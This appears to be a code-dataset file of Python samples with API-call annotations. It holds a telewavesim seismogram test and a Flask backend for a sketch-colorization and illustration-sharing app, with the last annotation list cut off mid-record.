"copy.deepcopy"
] |
[((882, 917), 'copy.deepcopy', 'copy.deepcopy', (['self.synapse.neurons'], {}), '(self.synapse.neurons)\n', (895, 917), False, 'import copy\n'), ((1062, 1159), 'kalliope.core.NeuronParameterLoader.NeuronParameterLoader.get_parameters', 'NeuronParameterLoader.get_parameters', ([], {'synapse_order': 'self.matched_order', 'user_order': 'user_order'}), '(synapse_order=self.matched_order,\n user_order=user_order)\n', (1098, 1159), False, 'from kalliope.core.NeuronParameterLoader import NeuronParameterLoader\n')]
|
from telewavesim import utils as ut
from telewavesim.rmat_f import plane as pw_f
from telewavesim import conf as cf
import numpy as np
import pyfftw
from conftest import load_params
def test_plane_obs(load_params):
yx, yy, yz = pw_f.plane_obs(cf.nt, cf.nlay, np.array(cf.wvtype, dtype='c'))
ux = np.real(pyfftw.interfaces.numpy_fft.fft(yx))
uy = np.real(pyfftw.interfaces.numpy_fft.fft(yy))
uz = np.real(pyfftw.interfaces.numpy_fft.fft(yz))
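    # The plane_obs solution is returned in the frequency domain; the real part
    # of the FFT is used here to obtain time-domain seismograms (an assumption
    # based on how the asserts below treat ux/uy/uz as seismograms).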
# seismogram should be maximized on vertical component
assert np.max(np.abs(uz)) > np.max(np.abs(ux)) > np.max(np.abs(uy)), \
'Failed! Energy is not maximized on vertical component'
# tangential component should all be close to zero
assert np.allclose(uy, np.zeros(len(uy))), 'non-zero values in uy'
def test_plane_land(load_params):
yx, yy, yz = pw_f.plane_land(cf.nt, cf.nlay, np.array(cf.wvtype, dtype='c'))
ux = np.real(pyfftw.interfaces.numpy_fft.fft(yx))
uy = np.real(pyfftw.interfaces.numpy_fft.fft(yy))
uz = np.real(pyfftw.interfaces.numpy_fft.fft(yz))
# seismogram should be maximized on vertical component
assert np.max(np.abs(uz)) > np.max(np.abs(ux)) > np.max(np.abs(uy)), \
'Failed! Energy is not maximized on vertical component'
# tangential component should all be close to zero
assert np.allclose(uy, np.zeros(len(uy))), 'non-zero values in uy'
trxyz = ut.get_trxyz(ux, uy, uz)
tfs = ut.tf_from_xyz(trxyz)
nt = tfs[0].stats.npts
# zero-lag should be maximized on radial component
assert tfs[0].data[int(nt/2)] > tfs[1].data[int(nt/2)], \
'Failed! Zero-lag is not maximized on radial component'
|
[
"numpy.abs",
"telewavesim.utils.get_trxyz",
"pyfftw.interfaces.numpy_fft.fft",
"telewavesim.utils.tf_from_xyz",
"numpy.array"
] |
[((1404, 1428), 'telewavesim.utils.get_trxyz', 'ut.get_trxyz', (['ux', 'uy', 'uz'], {}), '(ux, uy, uz)\n', (1416, 1428), True, 'from telewavesim import utils as ut\n'), ((1439, 1460), 'telewavesim.utils.tf_from_xyz', 'ut.tf_from_xyz', (['trxyz'], {}), '(trxyz)\n', (1453, 1460), True, 'from telewavesim import utils as ut\n'), ((266, 296), 'numpy.array', 'np.array', (['cf.wvtype'], {'dtype': '"""c"""'}), "(cf.wvtype, dtype='c')\n", (274, 296), True, 'import numpy as np\n'), ((315, 350), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yx'], {}), '(yx)\n', (346, 350), False, 'import pyfftw\n'), ((369, 404), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yy'], {}), '(yy)\n', (400, 404), False, 'import pyfftw\n'), ((423, 458), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yz'], {}), '(yz)\n', (454, 458), False, 'import pyfftw\n'), ((871, 901), 'numpy.array', 'np.array', (['cf.wvtype'], {'dtype': '"""c"""'}), "(cf.wvtype, dtype='c')\n", (879, 901), True, 'import numpy as np\n'), ((920, 955), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yx'], {}), '(yx)\n', (951, 955), False, 'import pyfftw\n'), ((974, 1009), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yy'], {}), '(yy)\n', (1005, 1009), False, 'import pyfftw\n'), ((1028, 1063), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yz'], {}), '(yz)\n', (1059, 1063), False, 'import pyfftw\n'), ((538, 548), 'numpy.abs', 'np.abs', (['uz'], {}), '(uz)\n', (544, 548), True, 'import numpy as np\n'), ((559, 569), 'numpy.abs', 'np.abs', (['ux'], {}), '(ux)\n', (565, 569), True, 'import numpy as np\n'), ((580, 590), 'numpy.abs', 'np.abs', (['uy'], {}), '(uy)\n', (586, 590), True, 'import numpy as np\n'), ((1143, 1153), 'numpy.abs', 'np.abs', (['uz'], {}), '(uz)\n', (1149, 1153), True, 'import numpy as np\n'), ((1164, 1174), 'numpy.abs', 'np.abs', (['ux'], {}), '(ux)\n', (1170, 1174), True, 'import numpy as np\n'), ((1185, 1195), 'numpy.abs', 'np.abs', (['uy'], {}), '(uy)\n', (1191, 1195), True, 'import numpy as np\n')]
|
import base64
import os
import re
import random
import threading
import cv2
import numpy as np
from flask import *
from auth.Auth import Auth
from dao.FollowDAO import FollowDAO
from dao.FollowerDAO import FollowerDAO
from dao.FollowingDAO import FollowingDAO
from dao.ImageDAO import WorkDAO
from dao.InformationDAO import InformationDAO
from dao.UserDAO import UserDAO
from dao.addressDAO import AddressDAO
from pojo.Image import Work
from pojo.Information import Information
from pojo.User import User
from operation.tricks import *
from operation.ai import *
from Result import *
from pojo.address import Address
app = Flask(__name__)
# Log in
# Already revised
@app.route('/user/login', methods=['POST'])
def login():
data = request.get_json()
if 'phone' not in data or 'password' not in data:
return "信息缺失"
phone = data['phone']
password = data['password']
# 判断电话号码是否为空
if phone is None:
return "The phone number is empty!"
# 判断密码是否为空
if password is None:
return "The password is empty!"
user = User()
user.set_phone(phone)
user.set_password(password)
try:
user = UserDAO().retrieve(user)
except:
return "Server Failure!"
# 用户不存在
if user is None:
result = return_status(-1)
return jsonify(result)
# 授权
result = Auth.authorize(user)
return jsonify(result)
# Register an account
# Already revised
@app.route('/user/register', methods=['POST'])
def register():
data = request.get_json()
if 'phone' not in data or 'password' not in data:
return "信息缺失"
phone = data['phone']
password = data['password']
# 判断电话号码是否为空
if phone is None:
return "The phone number is empty!"
# 判断密码是否为空
if password is None:
return "The password is empty!"
# 检测手机是否已经使用
phone_is_used = verify_phone(phone)
if phone_is_used:
result = return_status(-1) # 手机号码被使用
return jsonify(result)
# 检测手机格式是否正确
phone_format_false = verify_phone_format(phone)
if phone_format_false:
result = return_status(-2) # 手机格式不正确
return jsonify(result)
user = User()
user.set_phone(phone)
user.set_password(password)
try:
user_dao = UserDAO()
user_dao.add(user)
result = return_status(0)
        return jsonify(result) # registration succeeded
except:
return "Server failure!"
# Verify the phone number
def verify_phone(phone):
    return False
# Verify the phone number format
def verify_phone_format(phone):
    return False
# Log out
@app.route('/user/logout', methods=['GET'])
def logout():
result = return_status(0)
return jsonify(result)
# Get profile information
# Already revised
@app.route('/user/profile', methods=['GET'])
def getInformation():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
user_id = request.args.get('userid')
information = Information()
if user_id is None:
        # If user_id is empty, use the id from the JWT
        information.set_user_id(auth_user_id)
    else:
        # Otherwise use the provided user_id
information.set_user_id(user_id)
try:
information = InformationDAO().retrieve(information)
if information is None:
            # User does not exist
            result = return_status(-1)
            return jsonify(result)
        else:
            # Return the user information
result = return_Information(0, information)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
# Modify profile information
# Already revised
@app.route('/user/profile', methods=['POST'])
def modifyInformation():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
information = Information()
information.set_user_id(auth_user_id)
data = request.get_json()
if 'NickName' not in data:
return "上传的信息不完整"
nick_name = data['NickName']
nick_name = str(nick_name)
information.set_nick_name(nick_name)
if 'Avatar' not in data:
return "上传的信息不完整"
avatar = data['Avatar']
avatar = str(avatar)
information.set_avatar(avatar)
if 'Signature' not in data:
return "上传的信息不完整"
signature = data['Signature']
signature = str(signature)
information.set_signature(signature)
if 'BackgroundPhoto' not in data:
return "上传的信息不完整"
background_photo = data['BackgroundPhoto']
background_photo = str(background_photo)
information.set_background_photo(background_photo)
information_dao = InformationDAO()
result = information_dao.update(information)
result = return_status(result)
return jsonify(result)
# Create a folder
def mkdir(folder_path):
folder = os.path.exists(folder_path)
if not folder:
os.makedirs(folder_path)
return folder_path
# Upload avatar
@app.route('/user/avatar', methods=['POST'])
def upload_avatar():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
    # Set up the path
folder_path = 'avatar/' + str(auth_user_id)
mkdir(folder_path)
information = Information()
information.set_user_id(auth_user_id)
path = folder_path + '/avatar.jpg'
information.set_avatar(path)
    # Read the avatar image
    try:
        avatar = request.get_data()
        if avatar is None:
            return "Uploaded image is empty"
with open(path, 'wb') as f:
f.write(avatar)
except:
result = return_status(-2)
return jsonify(result)
    # Update the database
information_dao = InformationDAO()
try:
result = information_dao.update_avatar(information)
if result is not None:
result = return_homepage(result, path)
return jsonify(result)
else:
result = return_status(-2)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
# Upload the homepage background image
@app.route('/user/homepage', methods=['POST'])
def upload_homepage():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
    # Set up the path
folder_path = 'background/' + str(auth_user_id)
mkdir(folder_path)
information = Information()
path = folder_path + '/background.jpg'
information.set_user_id(auth_user_id)
information.set_background_photo(path)
    # Read the background image
    try:
        homepage = request.get_data()
        if homepage is None:
            return "Uploaded image is empty"
with open(path, 'wb') as f:
f.write(homepage)
except:
result = return_status(-2)
return jsonify(result)
    # Update the database
information_dao = InformationDAO()
try:
result = information_dao.update_background_photo(information)
if result is not None:
result = return_homepage(result, path)
return jsonify(result)
else:
result = return_status(-2)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
# Get the list of users I follow
@app.route('/user/following', methods=['GET'])
def following():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
following_dao = FollowingDAO()
try:
followings = following_dao.retrieve(retrieve_user.get_user_id())
results = return_following(followings)
return jsonify(results)
except:
result = return_status(-2)
return jsonify(result)
# Follow/unfollow
@app.route('/user/follow', methods=['POST'])
def follow():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
data = request.get_json()
if 'UserID' not in data or 'Cancel' not in data:
return "信息缺失"
user_id = data['UserID']
cancel_follow = data['Cancel']
follow_dao = FollowDAO()
if cancel_follow == 'True' or cancel_follow == 'true' or cancel_follow is True:
follow_dao.delete(user_id, auth_user_id)
result = return_status(1)
return jsonify(result)
if cancel_follow == 'False' or cancel_follow == 'false' or cancel_follow is False:
follow_dao.add(user_id, auth_user_id)
result = return_status(0)
return jsonify(result)
else:
result = return_status(-1)
return jsonify(result)
# Get the list of my followers
@app.route('/user/follower', methods=['GET'])
def follower():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
follower_dao = FollowerDAO()
try:
followers = follower_dao.retrieve(retrieve_user.get_user_id())
results = return_follower(followers)
return jsonify(results)
except:
result = return_status(-2)
return jsonify(result)
# Get an 11-digit random number
def get_work_id():
return random.randint(10000000000, 99999999999)
# Get a user's works
@app.route('/illustration/mywork', methods=['GET'])
def get_myworks():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
user_id = request.args.get('userid')
if user_id is None:
return "信息不完整"
# 获取用户
user = User()
user.set_user_id(user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
type = request.args.get('type')
if type is None:
return "信息不完整"
type = str(type)
top = request.args.get('top')
if top is None:
return "信息不完整"
top = str(top)
work_dao = WorkDAO()
works = work_dao.retrieve(user_id)
if type == 'home':
        if top == 'true' or top == 'True':
pass
else:
result = return_home(works)
return jsonify(result)
if type == 'detail':
        if top == 'true' or top == 'True':
pass
else:
result = return_detail(works)
return jsonify(result)
else:
return "信息不正确"
# 获取作品图片
@app.route('/illustration/image', methods=['GET'])
def get_image():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
# user = User()
# user.set_user_id(auth_user_id)
# user_dao = UserDAO()
# try:
# retrieve_user = user_dao.retrieve(user)
# except:
# result = return_status(-2)
# return jsonify(result)
    # User does not exist
# if retrieve_user is None:
# result = return_status(-1)
# return jsonify(result)
id = request.args.get('id')
if id is None:
return "信息不完整"
id = int(id)
size = request.args.get('size')
if size is None:
size = None
else:
size = str(size)
type = request.args.get('type')
if type is None:
type = None
else:
type = str(type)
print(type)
print(size)
path = WorkDAO().retrieve_address(id)
if size == 'mid':
if type == 'sketch':
path = path + '/sketch.jpg'
else:
if type is None or type == 'sketch':
path = path + '/work.jpg'
else:
return "信息不正确"
else:
if size is None:
if type == 'sketch':
path = path + '/sketch.jpg'
else:
if type is None or type == 'sketch':
path = path + '/work.jpg'
else:
return "信息不正确"
else:
return "信息不正确"
try:
with open(path, 'rb') as f:
image = f.read()
response = Response(image, mimetype='image/jpg')
return response
except:
return "Server Failure"
# Get liked works
@app.route('/illustration/mylike', methods=['GET'])
def get_mylike():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
user_id = request.args.get('userid')
if user_id is None:
return "信息不完整"
user_id = int(user_id)
# 获取用户
user = User()
user.set_user_id(user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
my_like_work_ids = user_dao.get_my_like(retrieve_user)
my_like_works = WorkDAO().list(my_like_work_ids)
start = request.args.get('start')
if start is None:
return "信息不完整"
start = int(start)
count = request.args.get('count')
if count is None:
return "信息不完整"
count = int(count)
type = request.args.get('type')
if type is None:
return "信息不完整"
type = str(type)
if type == 'home':
result = return_home_my_like(my_like_works, start, count)
return jsonify(result)
if type == 'detail':
result = return_detail_my_like(my_like_works, start, count)
return jsonify(result)
else:
return "信息不正确"
# 收藏作品
@app.route('/illustration/mylike', methods=['POST'])
def like():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
data = request.get_json()
if 'id' not in data or 'Cancel' not in data:
return "信息缺失"
id = data['id']
cancel_like = data['Cancel']
work_dao = WorkDAO()
if cancel_like == 'True' or cancel_like == 'true' or cancel_like is True:
work_dao.delete_my_like(auth_user_id, id)
result = return_status(1)
return jsonify(result)
if cancel_like == 'False' or cancel_like == 'false' or cancel_like is False:
work_dao.add_my_like(auth_user_id, id)
result = return_status(0)
return jsonify(result)
else:
result = return_status(-1)
return jsonify(result)
# Get work details
@app.route('/illustration/sketchwork', methods=['GET'])
def get_sketchwork():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
# user = User()
# user.set_user_id(auth_user_id)
# user_dao = UserDAO()
# try:
# retrieve_user = user_dao.retrieve(user)
# except:
# result = return_status(-2)
# return jsonify(result)
    # User does not exist
# if retrieve_user is None:
# result = return_status(-1)
# return jsonify(result)
id = request.args.get('id')
if id is None:
return "信息不完整"
id = int(id)
work_dao = WorkDAO()
try:
work = work_dao.retrieve_information(id)
result = return_detail_work(work)
return jsonify(result)
except:
return 'Server Failure'
# Search works
@app.route('/illustration/search', methods=['GET'])
def search():
keywords = request.args.get('keywords')
keywords = str(keywords)
return "search"
# Get popular sketches
@app.route('/illustration/favorite_sketch', methods=['GET'])
def get_favorite_sketch():
return 'get_favorite_sketch'
# Get popular colorizations
@app.route('/illustration/favorite_colorization', methods=['GET'])
def get_favorite_colorization():
return 'get_favorite_colorization'
# Today's recommended works
@app.route('/illustration/todays', methods=['GET'])
def get_todays():
return "get_todays"
# Publish a work
@app.route('/illustration/upload', methods=['POST'])
def upload():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
data = request.get_json()
if 'name' not in data or 'created' not in data or 'description' not in data or 'tags' not in data or 'allow_download' not in data or 'allow_sketch' not in data or 'allow_fork' not in data or 'original_image' not in data or 'colorization_image' not in data:
        return 'Incomplete information'
work = Work()
work.set_artist(auth_user_id)
name = data['name']
name = str(name)
work.set_name(name)
created_time = data['created']
created_time = str(created_time)
work.set_created(created_time)
description = data['description']
description = str(description)
work.set_description(description)
tags = data['tags']
work.set_tags(tags)
allow_downloaded = data['allow_download']
allow_downloaded = bool(allow_downloaded)
work.set_allow_fork(allow_downloaded)
allow_sketch = data['allow_sketch']
allow_sketch = bool(allow_sketch)
work.set_allow_sketch(allow_sketch)
allow_fork = data['allow_fork']
allow_fork = bool(allow_fork)
work.set_allow_fork(allow_fork)
original_image = data['original_image']
original_image = str(original_image)
colorization_image = data['colorization_image']
colorization_image = str(colorization_image)
address = Address()
address.set_original_image(original_image)
address.set_colorization_image(colorization_image)
work_dao = WorkDAO()
try:
work_dao.add_work(work, address)
result = return_status(0)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
def get_request_image(image):
image = re.sub('^data:image/.+;base64,', '', image)
image = base64.urlsafe_b64decode(image)
    image = np.fromstring(image, dtype=np.uint8)  # np.frombuffer is the non-deprecated equivalent
image = cv2.imdecode(image, -1)
return image
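# Example (hypothetical payload): for 'data:image/png;base64,iVBORw0...',
# get_request_image strips the data-URL prefix, base64-decodes the remainder
# and decodes the resulting bytes into an OpenCV image array.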
# pool = []
# lock = 1
#
#
def handle_colorization(pool):
# mutex = threading.Lock()
    # lock
    # mutex.acquire(lock)
    # print(len(pool))
    # if len(pool) > 0:
    #     sketch, points, path = pool[0]
    #     del pool[0]
    # else:
    #     return
    # release
# mutex.release()
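    # Colorization pipeline sketch (helper names are star-imported from
    # operation.ai / operation.tricks): 1) clean up the sketch (resize,
    # denoise, sensitivity boost), 2) build low-resolution drafts from the
    # user's hint points, 3) render the final image and write it to `path`.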
sketch, points, path = pool
improved_sketch = sketch.copy()
improved_sketch = min_resize(improved_sketch, 512)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
improved_sketch = go_tail(improved_sketch)
std = cal_std(improved_sketch)
if std > 100.0:
improved_sketch = go_passline(improved_sketch)
improved_sketch = min_k_down_c(improved_sketch, 2)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = go_tail(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
improved_sketch = min_black(improved_sketch)
improved_sketch = cv2.cvtColor(improved_sketch, cv2.COLOR_BGR2GRAY)
sketch_1024 = k_resize(improved_sketch, 64)
sketch_256 = mini_norm(k_resize(min_k_down(sketch_1024, 2), 16))
sketch_128 = hard_norm(sk_resize(min_k_down(sketch_1024, 4), 32))
baby = go_baby(sketch_128, opreate_normal_hint(ini_hint(sketch_128), points, type=0, length=1))
baby = de_line(baby, sketch_128)
for _ in range(16):
baby = blur_line(baby, sketch_128)
baby = go_tail(baby)
baby = clip_15(baby)
composition = go_gird(sketch=sketch_256, latent=d_resize(baby, sketch_256.shape), hint=ini_hint(sketch_256))
composition = go_tail(composition)
painting_function = go_head
reference = None
alpha = 0
result = painting_function(
sketch=sketch_1024,
global_hint=k_resize(composition, 14),
local_hint=opreate_normal_hint(ini_hint(sketch_1024), points, type=2, length=2),
global_hint_x=k_resize(reference, 14) if reference is not None else k_resize(composition, 14),
alpha=(1 - alpha) if reference is not None else 1
)
result = go_tail(result)
cv2.imwrite(path, result)
return
# Submit a colorization request
@app.route('/illustration/colorization', methods=['POST'])
def colorization():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
    # Get the user
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
    # User does not exist
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
    # Get the request data
    data = request.get_json()
    if 'image' not in data or 'points' not in data:
        return "Incomplete information"
image = data['image']
points = data['points']
for _ in range(len(points)):
points[_][1] = 1 - points[_][1]
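    # Flip the y coordinate of each hint point; presumably the client uses a
    # bottom-left origin while the model expects top-left (inferred from the
    # inversion above).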
# data = datas['data']
#
# anchor = data['anchor']
# anchor_x = anchor['x']
# anchor_y = anchor['y']
# anchor_color = anchor['color']
# print(anchor_x + ' ' + anchor_y + ' ' + anchor_color)
#
# hint = data['hint']
    # Process the image
try:
image = get_request_image(image)
image = from_png_to_jpg(image)
except:
result = return_status(-1)
return jsonify(result)
    # Generate the image id
id = get_work_id()
path = 'works/' + str(auth_user_id) + '/' + str(id)
path = mkdir(path)
cv2.imwrite(path + '/sketch.jpg', image)
address = Address()
address.set_work_id(id)
address.set_user_id(auth_user_id)
address.set_path(path)
original_image = str(auth_user_id) + str(id) + '0'
address.set_original_image(original_image)
colorization_image = str(auth_user_id) + str(id) + '1'
address.set_colorization_image(colorization_image)
receipt = str(id) + 'r' + str(auth_user_id)
address.set_receipt(receipt)
address_dao = AddressDAO()
address_dao.add(address)
path = path + '/result.jpg'
pool = [image, points, path]
threading.Thread(target=handle_colorization, args=(pool, )).start()
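    # The colorization runs on a background thread; the client polls the GET
    # endpoint below with the returned receipt to fetch the result.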
# cv2.imwrite(path, image)
result = return_receipt(0, address)
return jsonify(result)
# Query a colorization request
@app.route('/illustration/colorization', methods=['GET'])
def get_receipt():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
    # Invalid Authorization header
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
receipt = request.args.get('receipt')
if receipt is None:
        return 'Incomplete information'
receipt = str(receipt)
address = Address()
address.set_receipt(receipt)
address_dao = AddressDAO()
address = address_dao.retrieve(address)
if address is None:
result = return_status(-1)
return jsonify(result)
path = address.get_path() + '/result.jpg'
flag = os.path.exists(path)
if flag:
result = return_load(0, address)
return jsonify(result)
else:
result = return_status(1)
return jsonify(result)
# def handle_threading():
# while True:
# try:
# handle_colorization()
# except Exception as e:
# print(e)
# threading.Thread(target=handle_threading).start()
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, threaded=True)
|
[
"cv2.imdecode",
"pojo.User.User",
"pojo.Image.Work",
"auth.Auth.Auth.identify",
"random.randint",
"dao.addressDAO.AddressDAO",
"cv2.cvtColor",
"cv2.imwrite",
"os.path.exists",
"base64.urlsafe_b64decode",
"pojo.Information.Information",
"re.sub",
"numpy.fromstring",
"dao.FollowerDAO.FollowerDAO",
"threading.Thread",
"dao.FollowDAO.FollowDAO",
"dao.FollowingDAO.FollowingDAO",
"os.makedirs",
"dao.InformationDAO.InformationDAO",
"auth.Auth.Auth.authorize",
"pojo.address.Address",
"dao.UserDAO.UserDAO",
"dao.ImageDAO.WorkDAO"
] |
[((1059, 1065), 'pojo.User.User', 'User', ([], {}), '()\n', (1063, 1065), False, 'from pojo.User import User\n'), ((1342, 1362), 'auth.Auth.Auth.authorize', 'Auth.authorize', (['user'], {}), '(user)\n', (1356, 1362), False, 'from auth.Auth import Auth\n'), ((2141, 2147), 'pojo.User.User', 'User', ([], {}), '()\n', (2145, 2147), False, 'from pojo.User import User\n'), ((2778, 2797), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (2791, 2797), False, 'from auth.Auth import Auth\n'), ((2985, 2998), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (2996, 2998), False, 'from pojo.Information import Information\n'), ((3740, 3759), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (3753, 3759), False, 'from auth.Auth import Auth\n'), ((3909, 3915), 'pojo.User.User', 'User', ([], {}), '()\n', (3913, 3915), False, 'from pojo.User import User\n'), ((3966, 3975), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (3973, 3975), False, 'from dao.UserDAO import UserDAO\n'), ((4239, 4252), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (4250, 4252), False, 'from pojo.Information import Information\n'), ((5032, 5048), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (5046, 5048), False, 'from dao.InformationDAO import InformationDAO\n'), ((5207, 5234), 'os.path.exists', 'os.path.exists', (['folder_path'], {}), '(folder_path)\n', (5221, 5234), False, 'import os\n'), ((5452, 5471), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (5465, 5471), False, 'from auth.Auth import Auth\n'), ((5621, 5627), 'pojo.User.User', 'User', ([], {}), '()\n', (5625, 5627), False, 'from pojo.User import User\n'), ((5678, 5687), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (5685, 5687), False, 'from dao.UserDAO import UserDAO\n'), ((6034, 6047), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (6045, 6047), False, 'from pojo.Information import Information\n'), ((6454, 6470), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (6468, 6470), False, 'from dao.InformationDAO import InformationDAO\n'), ((6972, 6991), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (6985, 6991), False, 'from auth.Auth import Auth\n'), ((7141, 7147), 'pojo.User.User', 'User', ([], {}), '()\n', (7145, 7147), False, 'from pojo.User import User\n'), ((7198, 7207), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (7205, 7207), False, 'from dao.UserDAO import UserDAO\n'), ((7558, 7571), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (7569, 7571), False, 'from pojo.Information import Information\n'), ((7998, 8014), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (8012, 8014), False, 'from dao.InformationDAO import InformationDAO\n'), ((8521, 8540), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (8534, 8540), False, 'from auth.Auth import Auth\n'), ((8690, 8696), 'pojo.User.User', 'User', ([], {}), '()\n', (8694, 8696), False, 'from pojo.User import User\n'), ((8747, 8756), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (8754, 8756), False, 'from dao.UserDAO import UserDAO\n'), ((9022, 9036), 'dao.FollowingDAO.FollowingDAO', 'FollowingDAO', ([], {}), '()\n', (9034, 9036), False, 'from dao.FollowingDAO import FollowingDAO\n'), ((9414, 9433), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (9427, 9433), False, 'from auth.Auth import Auth\n'), ((9583, 9589), 'pojo.User.User', 'User', ([], {}), '()\n', (9587, 9589), False, 'from pojo.User import User\n'), ((9640, 9649), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (9647, 9649), False, 'from dao.UserDAO import UserDAO\n'), ((10083, 10094), 